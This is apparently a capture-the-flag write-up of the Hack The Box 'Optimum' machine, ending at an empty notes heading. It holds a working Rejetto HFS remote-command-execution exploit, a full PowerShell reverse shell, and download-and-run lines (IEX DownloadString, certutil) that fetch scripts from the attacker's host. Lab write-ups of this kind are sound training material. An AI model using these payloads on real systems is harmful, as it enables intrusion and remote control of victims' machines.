Optimum

Dec 10, 2020 TJNull's List
Share on:

Optimum

Introduction:

Recon

 1# nmap -sS -sV -sC -T4 -O -oN nmap.optimum.txt  10.10.10.8
 2Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-24 09:56 EST
 3Nmap scan report for 10.10.10.8
 4Host is up (0.014s latency).
 5Not shown: 999 filtered ports
 6PORT   STATE SERVICE VERSION
 780/tcp open  http    HttpFileServer httpd 2.3
 8|_http-server-header: HFS 2.3
 9|_http-title: HFS /
10Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
11Device type: general purpose
12Running (JUST GUESSING): Microsoft Windows 2012|2008|7|Vista (91%)
13OS CPE: cpe:/o:microsoft:windows_server_2012 cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows_7::-:professional cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1
14Aggressive OS guesses: Microsoft Windows Server 2012 (91%), Microsoft Windows Server 2012 or Windows Server 2012 R2 (91%), Microsoft Windows Server 2012 R2 (91%), Microsoft Windows Server 2008 R2 (85%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (85%), Microsoft Windows 7 Professional or Windows 8 (85%), Microsoft Windows 7 SP1 or Windows Server 2008 SP2 or 2008 R2 SP1 (85%), Microsoft Windows Vista SP0 or SP1, Windows Server 2008 SP1, or Windows 7 (85%), Microsoft Windows 7 Professional (85%), Microsoft Windows Vista SP2 (85%)
15No exact OS matches for host (test conditions non-ideal).
16Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
17
18OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
19Nmap done: 1 IP address (1 host up) scanned in 17.87 seconds
20
21

Notes:

  1. Only port 80 is open and its running HttpFileServer version 2.3
  2. The web page has a login information and also confirms the software version
  3. Lets fire up directory scans and enumerate using burp

Enumeration

1searchsploit httpfile
2----------------------------------------------------------------------------------- ---------------------------------
3 Exploit Title                                                                     |  Path
4----------------------------------------------------------------------------------- ---------------------------------
5Rejetto HttpFileServer 2.3.x - Remote Command Execution (3)                        | windows/webapps/49125.py
6----------------------------------------------------------------------------------- ---------------------------------

1searchsploit -m  /usr/share/exploitdb/exploits/windows/webapps/49125.py
2  Exploit: Rejetto HttpFileServer 2.3.x - Remote Command Execution (3)
3      URL: https://www.exploit-db.com/exploits/49125
4     Path: /usr/share/exploitdb/exploits/windows/webapps/49125.py
5File Type: UTF-8 Unicode text, with CRLF line terminators
6
7Copied to: hackthebox/optimum/data/49125.py
8

Exploitation

 1# Exploit Title: Rejetto HttpFileServer 2.3.x - Remote Command Execution (3)
 2# Google Dork: intext:"httpfileserver 2.3"
 3# Date: 28-11-2020
 4# Remote: Yes
 5# Exploit Author: Óscar Andreu
 6# Vendor Homepage: http://rejetto.com/
 7# Software Link: http://sourceforge.net/projects/hfs/
 8# Version: 2.3.x
 9# Tested on: Windows Server 2008 , Windows 8, Windows 7
10# CVE : CVE-2014-6287
11
12#!/usr/bin/python3
13
14# Usage :  python3 Exploit.py <RHOST> <Target RPORT> <Command>
15# Example: python3 HttpFileServer_2.3.x_rce.py 10.10.10.8 80 "c:\windows\SysNative\WindowsPowershell\v1.0\powershell.exe IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.4/shells/mini-reverse.ps1')"
16
17import urllib3
18import sys
19import urllib.parse
20
21try:
22	http = urllib3.PoolManager()	
23	url = f'http://{sys.argv[1]}:{sys.argv[2]}/?search=%00{{.+exec|{urllib.parse.quote(sys.argv[3])}.}}'
24	print(url)
25	response = http.request('GET', url)
26	
27except Exception as ex:
28	print("Usage: python3 HttpFileServer_2.3.x_rce.py RHOST RPORT command")
29	print(ex)

1$ python3 -m http.server
2Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
310.10.10.8 - - [24/Dec/2020 10:31:54] "GET /mini-reverse.ps1 HTTP/1.1" 200 -
410.10.10.8 - - [24/Dec/2020 10:31:54] "GET /mini-reverse.ps1 HTTP/1.1" 200 -
510.10.10.8 - - [24/Dec/2020 10:31:54] "GET /mini-reverse.ps1 HTTP/1.1" 200 -
610.10.10.8 - - [24/Dec/2020 10:31:54] "GET /mini-reverse.ps1 HTTP/1.1" 200 -
7

 1$socket = new-object System.Net.Sockets.TcpClient('10.10.14.15', 4444);
 2if($socket -eq $null){exit 1}
 3$stream = $socket.GetStream();
 4$writer = new-object System.IO.StreamWriter($stream);
 5$buffer = new-object System.Byte[] 1024;
 6$encoding = new-object System.Text.AsciiEncoding;
 7do
 8{
 9	$writer.Flush();
10	$read = $null;
11	$res = ""
12	while($stream.DataAvailable -or $read -eq $null) {
13		$read = $stream.Read($buffer, 0, 1024)
14	}
15	$out = $encoding.GetString($buffer, 0, $read).Replace("`r`n","").Replace("`n","");
16	if(!$out.equals("exit")){
17		$args = "";
18		if($out.IndexOf(' ') -gt -1){
19			$args = $out.substring($out.IndexOf(' ')+1);
20			$out = $out.substring(0,$out.IndexOf(' '));
21			if($args.split(' ').length -gt 1){
22                $pinfo = New-Object System.Diagnostics.ProcessStartInfo
23                $pinfo.FileName = "cmd.exe"
24                $pinfo.RedirectStandardError = $true
25                $pinfo.RedirectStandardOutput = $true
26                $pinfo.UseShellExecute = $false
27                $pinfo.Arguments = "/c $out $args"
28                $p = New-Object System.Diagnostics.Process
29                $p.StartInfo = $pinfo
30                $p.Start() | Out-Null
31                $p.WaitForExit()
32                $stdout = $p.StandardOutput.ReadToEnd()
33                $stderr = $p.StandardError.ReadToEnd()
34                if ($p.ExitCode -ne 0) {
35                    $res = $stderr
36                } else {
37                    $res = $stdout
38                }
39			}
40			else{
41				$res = (&"$out" "$args") | out-string;
42			}
43		}
44		else{
45			$res = (&"$out") | out-string;
46		}
47		if($res -ne $null){
48        $writer.WriteLine($res)
49    }
50	}
51}While (!$out.equals("exit"))
52$writer.close();
53$socket.close();
54$stream.Dispose()
55

 1$ nc -lvnp 4444
 2listening on [any] 4444 ...
 3ls
 4dir
 5connect to [10.10.14.15] from (UNKNOWN) [10.10.10.8] 49165
 6
 7
 8    Directory: C:\Users\kostas\Desktop
 9
10
11Mode                LastWriteTime     Length Name                              
12----                -------------     ------ ----                              
13-a---         18/3/2017   2:11 μμ     760320 hfs.exe                           
14-ar--         18/3/2017   2:13 μμ         32 user.txt.txt                      
15
16
17
18
19
20    Directory: C:\Users\kostas\Desktop
21
22
23Mode                LastWriteTime     Length Name                              
24----                -------------     ------ ----                              
25-a---         18/3/2017   2:11 μμ     760320 hfs.exe                           
26-ar--         18/3/2017   2:13 μμ         32 user.txt.txt                      
27

Post-exploit/PrivEsc

1C:\Users\Public\Downloads                                                      
2
3
4
5certutil.exe -urlcache -f http://10.10.14.15:8000/winPEAS.bat C:\Users\Public\Downloads\winpeas.bat
6****  Online  ****
7CertUtil: -URLCache command completed successfully.
8
9

c:\windows\SysNative\WindowsPowershell\v1.0\powershell.exe IEX (New-Object Net.WebClient).DownloadString(‘http://10.10.14.15:8000/Sherlock.ps1’)"

certutil.exe -urlcache -f http://10.10.14.15:8000/Sherlock.ps1 C:\Users\kostas\Desktop\Sherlock.ps1

Notes: